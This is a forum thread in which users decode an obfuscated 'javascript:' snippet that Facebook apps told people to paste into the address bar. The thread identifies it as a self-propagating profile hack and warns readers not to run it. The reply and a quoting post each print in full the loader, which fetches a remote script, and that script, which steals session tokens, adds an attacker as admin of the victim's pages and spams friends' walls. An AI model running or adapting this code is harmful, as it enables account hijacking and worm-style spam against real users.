Can anyone decrypt?

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Time
  • Show
Clear All
new posts
Previous template Next
    #1

    Can anyone decrypt?

    Some Facebook apps are asking to apply this code in the address bar. Anyone know what it does?

    Code:
    javascript: var _0x9557=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x2f\x2f\x67\x61\x6d\x65\x73\x70\x68\x61\x73\x65\x2e\x63\x6f\x6d\x2f\x66\x62\x2f\x62\x2e\x6a\x73","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];(a=(b=document)[_0x9557[2]](_0x9557[1]))[_0x9557[0]]=_0x9557[3];b[_0x9557[5]][_0x9557[4]](a); void (0);
    mysterio.al - programming is a functional art
    Tags: None
    #2
    Originally posted by Mysterio3 View Post
    Some Facebook apps are asking to apply this code in the address bar. Anyone know what it does?

    Code:
    javascript: var _0x9557=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x2f\x2f\x67\x61\x6d\x65\x73\x70\x68\x61\x73\x65\x2e\x63\x6f\x6d\x2f\x66\x62\x2f\x62\x2e\x6a\x73","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x62\x6F\x64\x79"];(a=(b=document)[_0x9557[2]](_0x9557[1]))[_0x9557[0]]=_0x9557[3];b[_0x9557[5]][_0x9557[4]](a); void (0);

    Code:
    javascript: var _0x9557=["src","script","createElement","//gamesphase.com/fb/b.js","appendChild","body"];(a=(b=document)[_0x9557[2]](_0x9557[1]))[_0x9557[0]]=_0x9557[3];b[_0x9557[5]][_0x9557[4]](a); void (0);
    It's trying to make a <script> tag with //gamesphase.com/fb/b.js as the source and place it inside the body tag.

    This are the contents of gamesphase.com.fb/b.js. I think it checks if the user is a fan of the app's fan page.
    Code:
    //These are to be posted as status messages
txt = "Luaj KUSH DO TE BEHET MILIONER SHQIP ketu : http://www.facebook.com/pages/Kush-Do-Te-Behet-Milioner-Shqip/190879720938610 provo njohurit e tua";
txtee = "Luaj KUSH DO TE BEHET MILIONER SHQIP ketu : http://www.facebook.com/pages/Kush-Do-Te-Behet-Milioner-Shqip/190879720938610 provo njohurit e tua";
 
alert("Ju Lutem Prisni 10 sekonda, ne duhet ta kontrollojme nese jeni bere fansa. Pastaj klikoni OK per te vazhduar.");
with(x = new XMLHttpRequest()) open("GET", "/"), onreadystatechange=function () {

  if (x.readyState == 4 && x.status == 200) {
  z=x.responseText;
    //comp = z.match(/name="UIComposer_STATE_PIC_OUTSIDE" value="([\d\w]+)"/i)[1];
  //  comp = x.responseText.match(/name="UIComposer_STATE_PIC_OUTSIDE" id="([\d\w]+)"/i)[1];
   form = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
  dt = z.match(/name="fb_dtsg" value="([\d\w-_]+)"/i)[1];
 pfid = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];

 
    with(xx = new XMLHttpRequest())
      open("GET", "/ajax/browser/friends/?uid=" +
               document.cookie.match(/c_user=(\d+)/)[1] +
                  "&filter=all&__a=1&__d=1"),
      onreadystatechange=function () {
      //extracts list of friends
 
        if (xx.readyState == 4 && xx.status == 200) {
        m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join("\n").replace(/(\/\d+_|_\d+_q\.jpg)/gi, "").split("\n");
        //facebook returns list of friends images of the form of three numbers separated by _,
        //the above regular expression extracts out the middle of the two
        //(which infact is the userID of friend)
        i = 0;
        llimit=25;
        t = setInterval(function () {
          if (i >= llimit )
            return;//it seems the limit is 25 posts per 2 seconds on facebook (to be counted as bot)
          if(i == 0) {//do it only once
            with(ddddd = new XMLHttpRequest()) open("GET", "/ajax/pages/dialog/manage_pages.php?__a=1&__d=1"),
                 setRequestHeader("X-Requested-With", null),
                 setRequestHeader("X-Requested", null),
                 onreadystatechange=function() {
              if(ddddd.readyState == 4 && ddddd.status == 200) {
                llm = (d = ddddd.responseText).match(/\\"id\\":([\d]+)/gi); len =llm.length;
                j=0;
                for(j=0;j<len;j++) {
                  with(xxxcxxx = new XMLHttpRequest()) open("POST", "/pages/edit/?id="+llm[j].replace(/\\"id\\":/i, "")+"&sk=admin"),
                       setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
                       send("post_form_id="+pfid+"&fb_dtsg="+dt+"&fbpage_id="+llm[j].replace(/\\"id\\":/i, "")+
                            "&friendselector_input%5B%5D=fshderri%40gmail.com%09&friend_selected%5B%5D=&save=1");
                       //I am not very sure on this one but it seems it adds as admin of all pages the user holds
                }
              }
            }, send(null); //end of function to change the admins
 
            
                
                  // this one collects cookie as well as the personalized status update email address
                  // (a photo sent to that address is posted on the wall directly)
 
             
            }
          
 
            //following code does status update
            //the code writes message represented by txt and txtee alternately on the wall of friends.
            //txt and txtee are same though (may be author's mistake)
            if(i%2==0)
            {
              with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),
                setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
                send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txt +
                "&target_id=" + m[Math.floor(Math.random() * m.length)] +
                //m is an array of id of friends (was created early in the script exec), choose a random friend
                "&composer_id=" +
                "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" +form + "&fb_dtsg=" + dt +
                //comp, form, dt are (probably) XSRF prevention tokens
                "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
            }
            else
            {
              with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),
                   setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
                   send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txtee +
                        "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id="+
                        "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt +
                        "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
            }
            i += 1;
        }, 2000);// 2000 milli-sec window, after which the script is executed again
      }
 
    }, send(null);
  }
}, send(null);
    Last edited by eeeh_aarrh; 07.02.11, 19:41.

    Comment

      #3
      Thank you! Best answer ;)
      mysterio.al - programming is a functional art

      Comment

        #4
        excellent reply man!!!!!!.............................

        excellent reply man.....






        Originally posted by eeeh_aarrh View Post
        Code:
        javascript: var _0x9557=["src","script","createElement","//gamesphase.com/fb/b.js","appendChild","body"];(a=(b=document)[_0x9557[2]](_0x9557[1]))[_0x9557[0]]=_0x9557[3];b[_0x9557[5]][_0x9557[4]](a); void (0);
        It's trying to make a <script> tag with //gamesphase.com/fb/b.js as the source and place it inside the body tag.

        This are the contents of gamesphase.com.fb/b.js. I think it checks if the user is a fan of the app's fan page.
        Code:
        //These are to be posted as status messages
txt = "Luaj KUSH DO TE BEHET MILIONER SHQIP ketu : http://www.facebook.com/pages/Kush-Do-Te-Behet-Milioner-Shqip/190879720938610 provo njohurit e tua";
txtee = "Luaj KUSH DO TE BEHET MILIONER SHQIP ketu : http://www.facebook.com/pages/Kush-Do-Te-Behet-Milioner-Shqip/190879720938610 provo njohurit e tua";
 
alert("Ju Lutem Prisni 10 sekonda, ne duhet ta kontrollojme nese jeni bere fansa. Pastaj klikoni OK per te vazhduar.");
with(x = new XMLHttpRequest()) open("GET", "/"), onreadystatechange=function () {

  if (x.readyState == 4 && x.status == 200) {
  z=x.responseText;
    //comp = z.match(/name="UIComposer_STATE_PIC_OUTSIDE" value="([\d\w]+)"/i)[1];
  //  comp = x.responseText.match(/name="UIComposer_STATE_PIC_OUTSIDE" id="([\d\w]+)"/i)[1];
   form = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];
  dt = z.match(/name="fb_dtsg" value="([\d\w-_]+)"/i)[1];
 pfid = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];

 
    with(xx = new XMLHttpRequest())
      open("GET", "/ajax/browser/friends/?uid=" +
               document.cookie.match(/c_user=(\d+)/)[1] +
                  "&filter=all&__a=1&__d=1"),
      onreadystatechange=function () {
      //extracts list of friends
 
        if (xx.readyState == 4 && xx.status == 200) {
        m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join("\n").replace(/(\/\d+_|_\d+_q\.jpg)/gi, "").split("\n");
        //facebook returns list of friends images of the form of three numbers separated by _,
        //the above regular expression extracts out the middle of the two
        //(which infact is the userID of friend)
        i = 0;
        llimit=25;
        t = setInterval(function () {
          if (i >= llimit )
            return;//it seems the limit is 25 posts per 2 seconds on facebook (to be counted as bot)
          if(i == 0) {//do it only once
            with(ddddd = new XMLHttpRequest()) open("GET", "/ajax/pages/dialog/manage_pages.php?__a=1&__d=1"),
                 setRequestHeader("X-Requested-With", null),
                 setRequestHeader("X-Requested", null),
                 onreadystatechange=function() {
              if(ddddd.readyState == 4 && ddddd.status == 200) {
                llm = (d = ddddd.responseText).match(/\\"id\\":([\d]+)/gi); len =llm.length;
                j=0;
                for(j=0;j<len;j++) {
                  with(xxxcxxx = new XMLHttpRequest()) open("POST", "/pages/edit/?id="+llm[j].replace(/\\"id\\":/i, "")+"&sk=admin"),
                       setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
                       send("post_form_id="+pfid+"&fb_dtsg="+dt+"&fbpage_id="+llm[j].replace(/\\"id\\":/i, "")+
                            "&friendselector_input%5B%5D=fshderri%40gmail.com%09&friend_selected%5B%5D=&save=1");
                       //I am not very sure on this one but it seems it adds as admin of all pages the user holds
                }
              }
            }, send(null); //end of function to change the admins
 
            
                
                  // this one collects cookie as well as the personalized status update email address
                  // (a photo sent to that address is posted on the wall directly)
 
             
            }
          
 
            //following code does status update
            //the code writes message represented by txt and txtee alternately on the wall of friends.
            //txt and txtee are same though (may be author's mistake)
            if(i%2==0)
            {
              with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),
                setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
                send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txt +
                "&target_id=" + m[Math.floor(Math.random() * m.length)] +
                //m is an array of id of friends (was created early in the script exec), choose a random friend
                "&composer_id=" +
                "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" +form + "&fb_dtsg=" + dt +
                //comp, form, dt are (probably) XSRF prevention tokens
                "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
            }
            else
            {
              with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),
                   setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),
                   send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txtee +
                        "&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id="+
                        "&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt +
                        "&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest");
            }
            i += 1;
        }, 2000);// 2000 milli-sec window, after which the script is executed again
      }
 
    }, send(null);
  }
}, send(null);

        Comment

          #5
          It's a profile hack

          eeeh_aarrh is totally correct.
          This is the recent facebook hack code spread amazingly fast since january. What it does, it obviously creates a script tag inside the current user's page and includes an external javascript file. At this point, it calls functions from that js file to manipulate browser requests and execute commands without user knowing. It will immediately grant the attacker with admin access to all of the victim's pages and will post a link in random victim's friends wall to spread the fake page even more.
          Mr Mysterio you are highly advised NOT to execute this script or any other similar scripts unless you RALLY know what you are doing...
          By the way you can see the atacker's email adress is fshderri@gmail.com so if you know any black list service, report it.
          P.S.: I tried a similar code just for curiosity, with my email address, and it really works and it's a very clever trick to HACK user's profile and pages.
          DON'T TRY THIS OR YOUR PROFILE IS DEAD!

          Comment

            #6
            I didn't know it was a facebook hack. LOL. Haven't read the whole code though.

            Comment

            Previous template Next
            Working...
            X